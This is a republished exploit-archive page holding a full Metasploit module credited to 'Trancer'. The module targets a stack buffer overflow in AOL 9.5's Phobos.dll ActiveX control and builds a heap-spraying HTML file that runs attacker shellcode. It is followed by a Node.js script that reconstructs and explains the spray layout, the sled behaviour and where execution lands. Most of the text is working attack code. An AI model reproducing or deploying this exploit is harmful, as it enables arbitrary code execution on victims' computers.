AOL 9.5 Phobos.Playlist 'Import()' Buffer Overflow Exploit (Meta)
Source: http://www.rec-sec.com  Author: Trancer  Published: 2010-01-26

##
# aol_phobos_bof.rb
#
# AOL 9.5 Phobos.Playlist 'Import()' Stack-based Buffer Overflow exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
#  - AOL 9.5 (Revision 4337.155) on Internet Explorer 7, Windows XP SP3
#
# Phobos.dll version tested:
# File Version: 9.5.0.1
# ClassID: A105BD70-BF56-4D10-BC91-41C88321F47C
# RegKey Safe for Script: False
# RegKey Safe for Init: False
# Implements IObjectSafety: False
# KillBitSet: False
#
# Because this ActiveX control is marked neither safe for scripting nor safe for
# initialization and does not implement IObjectSafety, Internet Explorer will not
# instantiate or script it from the Internet Zone. Exploitation is therefore only
# possible from the Local Machine Zone, which means the victim must open the
# generated exploit file locally.
#
# Trancer
# http://www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = AverageRanking

 include Msf::Exploit::FILEFORMAT

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow',
   'Description'    => %q{
    This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.
    By setting an overly long value to 'Import()', an attacker can overrun a buffer
    and execute arbitrary code.
   },
   'License'        => MSF_LICENSE,
   'Author'         => [
      'Trancer <mtrancer[at]gmail.com>'
      ],
   'Version'        => '$Revision:$',
   'References'     =>
    [
     [ 'URL', 'http://www.exploit-db.com/exploits/11204' ],
     [ 'URL', 'http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/' ],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
    },
   'Payload'        =>
    {
     'Space'         => 1024,
     'BadChars'      => "\x00\x09\x0a\x0d'\\", 
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C, 'Offset' => 1000 } ] 
    ],
   'DisclosureDate' => 'Jan 20 2010',
   'DefaultTarget'  => 0))

   register_options(
    [
     OptString.new('FILENAME',   [ false, 'The file name.',  'msf.html']),
    ], self.class)
 end

 def exploit

  # Encode the shellcode as %uXXXX escapes for JavaScript's unescape()
  shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

  # Setup exploit buffers. 0x0C0C0C0C doubles as the sprayed return address and
  # as the sled (0x0C decodes as 'or al, 0x0C'). blocksize is measured in UTF-16
  # code units (two bytes each), fillto is the number of strings sprayed, and the
  # loop below passes Offset+1 four-byte copies of ret to Import() to overrun the
  # buffer.
  nops    = Rex::Text.to_unescape([target.ret].pack('V'))
  ret     = Rex::Text.uri_encode([target.ret].pack('L'))
  blocksize = 0x40000
  fillto    = 500
  offset    = target['Offset']
  
  # Randomize the javascript variable names
  phobos       = rand_text_alpha(rand(100) + 1)
  j_shellcode  = rand_text_alpha(rand(100) + 1)
  j_nops       = rand_text_alpha(rand(100) + 1)
  j_ret        = rand_text_alpha(rand(100) + 1)
  j_headersize = rand_text_alpha(rand(100) + 1)
  j_slackspace = rand_text_alpha(rand(100) + 1)
  j_fillblock  = rand_text_alpha(rand(100) + 1)
  j_block      = rand_text_alpha(rand(100) + 1)
  j_memory     = rand_text_alpha(rand(100) + 1)
  j_counter    = rand_text_alpha(rand(30) + 2)
  j_bla        = rand_text_alpha(rand(8) + 4)

  html = %Q|<html>
<object classid='clsid:A105BD70-BF56-4D10-BC91-41C88321F47C' id='#{phobos}'></object>
<script>
#{j_shellcode}=unescape('#{shellcode}');
#{j_nops}=unescape('#{nops}');
#{j_headersize}=20;
#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
#{j_memory}=new Array();
for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};

var #{j_ret}='';
for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');
#{phobos}.Import(#{j_ret},'#{j_bla}','True','True');
</script>
</html>|

  print_status("Creating '#{datastore['FILENAME']}' file ...")

  file_create(html)
 end

end
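The heap-spray arithmetic from the module's generated JavaScript, reproduced below as an added example (this is not Trancer's code and not part of the Metasploit Framework) so the layout can be checked offline with Node. The constants are the module's own (ret 0x0C0C0C0C, headersize 20, blocksize 0x40000 code units, fillto 500); the eight-byte int3 placeholder shellcode, the base address 0x02000000 assumed for the first sprayed string, and the helper names (toUnescape, fromUnescape, buildElement, landing, sledEntry, summary) are assumptions made for illustration.

```javascript
'use strict';

// Constants taken from the module above.
const RET = 0x0C0C0C0C;     // sprayed return address; 0x0C is also 'or al, imm8'
const HEADERSIZE = 20;      // module's estimate of the JS string header, in UTF-16 code units
const BLOCKSIZE = 0x40000;  // length each sprayed string is grown to, in code units
const FILLTO = 500;         // number of sprayed strings

// Equivalent of Rex::Text.to_unescape for little-endian input: byte pairs -> %uXXXX.
function toUnescape(bytes) {
  if (bytes.length % 2 !== 0) throw new Error('even-length input expected');
  let out = '';
  for (let i = 0; i < bytes.length; i += 2) {
    out += '%u' + ((bytes[i + 1] << 8) | bytes[i]).toString(16).padStart(4, '0');
  }
  return out;
}

// What unescape() does with those escapes: each %uXXXX becomes one UTF-16 code unit.
function fromUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Bytes a JS string occupies in memory (UTF-16LE), i.e. what EIP will execute.
function toBytes(s) {
  const out = [];
  for (let i = 0; i < s.length; i++) {
    const c = s.charCodeAt(i);
    out.push(c & 0xff, c >>> 8);
  }
  return out;
}

// Builds one sprayed string with exactly the loops the module emits.
function buildElement(shellcode) {
  let nops = fromUnescape(toUnescape([0x0c, 0x0c, 0x0c, 0x0c]));  // RET as 2 code units
  const slackspace = HEADERSIZE + shellcode.length;
  while (nops.length < slackspace) nops += nops;
  const fillblock = nops.substring(0, slackspace);
  let block = nops.substring(0, nops.length - slackspace);
  while (block.length + slackspace < BLOCKSIZE) block = block + block + fillblock;
  return { sled: block, element: block + shellcode };
}

// Bytes of one sprayed string including the assumed header: the stride between
// consecutive sprayed allocations if the allocator places them back to back.
function strideBytes(element) {
  return (element.length + HEADERSIZE) * 2;
}

// Given a hypothetical base address for the first sprayed string, reports which
// string `addr` falls in and whether it hits the header, the sled or the shellcode.
function landing(element, sledUnits, base, addr = RET) {
  const stride = strideBytes(element);
  const rel = addr - base;
  const index = Math.floor(rel / stride);
  const offset = (rel % stride) - HEADERSIZE * 2;  // byte offset into the string data
  let region;
  if (offset < 0) region = 'header';
  else if (offset < sledUnits * 2) region = 'sled';
  else region = 'shellcode';
  return { index, offset, region, covered: index >= 0 && index < FILLTO };
}

// Where execution really starts after landing at byte offset `off` of the string:
// every 0x0C is a two-byte 'or al, imm8', so the sled is walked two bytes at a
// time. Returns the byte offset of the first instruction that is not sled.
function sledEntry(bytes, off) {
  let i = off;
  while (i < bytes.length && bytes[i] === 0x0c) i += 2;
  return i;
}

// Constructed placeholder shellcode: eight int3 bytes, not a real payload.
const SHELLCODE = fromUnescape(toUnescape([0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc]));
const { sled, element } = buildElement(SHELLCODE);
const ELEMENT_BYTES = toBytes(element);
const ASSUMED_BASE = 0x02000000;  // hypothetical address of the first sprayed string

// What the spray arithmetic gives for the module's constants.
function summary() {
  return {
    sledUnits: sled.length,
    elementUnits: element.length,
    stride: strideBytes(element),
    totalSprayed: strideBytes(element) * FILLTO,
    hit: landing(element, sled.length, ASSUMED_BASE),
    shellcodeStart: sled.length * 2,
    entryEven: sledEntry(ELEMENT_BYTES, 0),  // land on an even byte: enters at shellcodeStart
    entryOdd: sledEntry(ELEMENT_BYTES, 1),   // land on an odd byte: enters one byte late
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(summary());
```

Run it with node to print the summary. The growth loop keeps block.length + slackspace at a power of two (it starts at the doubled nops length and doubles each pass), so it stops at exactly 0x40000 code units, and every sprayed string plus the assumed 20-unit header occupies exactly 0x80000 bytes; 500 of them cover about 250 MB, which reaches 0x0C0C0C0C from any plausible heap base. sledEntry shows the caveat of using 0x0C as the sled byte: landing on an odd byte offset makes the final 'or al, imm8' swallow the first shellcode byte, so execution enters one byte into the payload.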

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved